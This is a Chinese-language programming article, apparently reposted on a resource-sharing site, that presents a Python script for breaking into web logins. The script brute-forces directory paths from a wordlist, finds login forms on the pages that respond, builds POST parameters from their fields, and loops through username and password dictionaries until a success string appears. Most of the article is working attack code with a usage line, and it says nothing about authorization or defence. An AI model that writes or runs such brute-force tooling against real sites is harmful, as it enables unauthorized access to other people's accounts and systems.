python遍历路径破解表单的示例

000

首先是利用python遍历路径,采用字典爆破的形式,当然如果只是单纯的爆破路径,简单写一个多线程脚本就行了。这里考虑如何对爆破到的路径进行第二步利用,此处尝试对猜解到的路径进行表单发现及登陆爆破处理。

首先就是路径爆破,采用多线程队列,爆破路径,判断形式为200响应码。 

    while not self._queue.empty():
      queue = self._queue.get(timeout=0.5)
      try:
        r = requests.get(self.url+queue,timeout=5, headers=self.headers)
        if r.status_code == 200:
          print \"[200] %s\" %(queue)
          soup = BeautifulSoup(r.content,\'html.parser\')
          if soup.find(\'form\'):
            self.brute(soup, queue)

猜解到路径后交给brute方法处理,方法实现了一个css选择器,获取form表单中的input字段标签,提取标签参数组合成post参数值,然后提取表单中的action跳转页面,如没有页面默认在当前表单页提交。 

input = soup.select(\"form input\")
      for i in input:
        try:
          if i.attrs[\'type\'] == \"hidden\":
            name, value = i.attrs[\'name\'], i.attrs[\'value\']
            list_post.append(name+\'=\'+value)
          elif i.attrs[\'type\'] == \'password\':
            name = i.attrs[\'name\']
            list_post.append(name+\'=$$$\')
          else:
            name = i.attrs[\'name\']
            list_post.append(name+\'=%%%\')
        except:
          continue
      for i in list_post:
        post = post + i + \'&\'
      action = soup.find_all(\'form\')
      for i in action:
        if i[\'action\']:
          actiontag = i[\'action\']
        else:
          actiontag = queue
      self.payload(post, actiontag)

获取参数值后,交给payload方法处理登陆,采用requests库的session登陆。获取cookie,先采用session请求获取cookie后,再采用session携带cookie进行请求提交。然后对输入的验证值进行判断是否为登陆成功。 

    for name in self.username():
      post_user = post.replace(\'%%%\',name.strip())
      for pwd in self.password():
        post_pwd = post_user.replace(\'$$$\',pwd.strip())
        session = requests.Session()
        session.get(self.url+\'/\'+action, headers=self.headers, verify=False)
        r = session.post(self.url+\'/\'+action, data=post_pwd, headers=self.headers, verify=False)
        if self.word in r.content:
          print \'[username] %s\' %name +\'\\r\' + \'[password] %s\' %pwd
          return

为了判断是否登陆成功,采用的人为输入判断字符串的形式。也就是脚本执行形式为 

python xxx.py http://xxxx.com xxxxx

以上就是python遍历路径破解表单的示例的详细内容,更多关于python 破解表单的资料请关注免费资源网其它相关文章!

© 版权声明
版权声明 1 本网站名称:偶像资源网
2 本站永久网址:https://www.ox520.com
3 本网站的文章部分内容可能来源于网络,仅供大家学习与参考,如有侵权,请联系站长 QQ593098775进行删除处理。
4 本站一切资源不代表本站立场,并不代表本站赞同其观点和对其真实性负责。
5 本站一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向站长举报
6 本站资源大多存储在云盘,如发现链接失效,请联系我们我们会第一时间更新。
THE END
Python
# 编程开发# python
喜欢就支持一下吧
点赞0 分享
网络的头像-偶像资源网
python多维列表总是只转为一维数组问题解决-偶像资源网
python多维列表总是只转为一维数组问题解决
python多维列表总是只转为一维数组问题解决
24天前 41
Python pyecharts 数据可视化模块的配置方法-偶像资源网
Python pyecharts 数据可视化模块的配置方法
Python pyecharts 数据可视化模块的配置方法
24天前 28
CSS 点击radio实现两个图片样式切换并且多个radio中只能有一个checked-偶像资源网
CSS 点击radio实现两个图片样式切换并且多个radio中只能有一个checked
CSS 点击radio实现两个图片样式切换并且多个radio中只能有一个checke...
28天前 4
jQuery实现滚动效果-偶像资源网
jQuery实现滚动效果
jQuery实现滚动效果
25天前 3
PHP队列原理及基于队列的写文件案例-偶像资源网
PHP队列原理及基于队列的写文件案例
PHP队列原理及基于队列的写文件案例
25天前 2
css文本两端对齐的实现代码-偶像资源网
css文本两端对齐的实现代码
css文本两端对齐的实现代码
28天前 2
相关推荐
python多维列表总是只转为一维数组问题解决-偶像资源网
python多维列表总是只转为一维数组问题解决
python多维列表总是只转为一维数组问题解决
24天前 41
Python pyecharts 数据可视化模块的配置方法-偶像资源网
Python pyecharts 数据可视化模块的配置方法
Python pyecharts 数据可视化模块的配置方法
24天前 28
吊打全网所有精美导航页引导页HTML源码-偶像资源网
吊打全网所有精美导航页引导页HTML源码
吊打全网所有精美导航页引导页HTML源码
28天前 24
5.9K⭐ 轻松搞定定时任务!Web管理超便捷-偶像资源网
5.9K⭐ 轻松搞定定时任务!Web管理超便捷
5.9K⭐ 轻松搞定定时任务!Web管理超便捷
28天前 23
css的基本选择器有哪些?-偶像资源网
css的基本选择器有哪些?
css的基本选择器有哪些?
29天前 23
【jQuery Demo】图片切换效果整理-偶像资源网
【jQuery Demo】图片切换效果整理
【jQuery Demo】图片切换效果整理
26天前 4
评论 抢沙发

请登录后发表评论

    暂无评论内容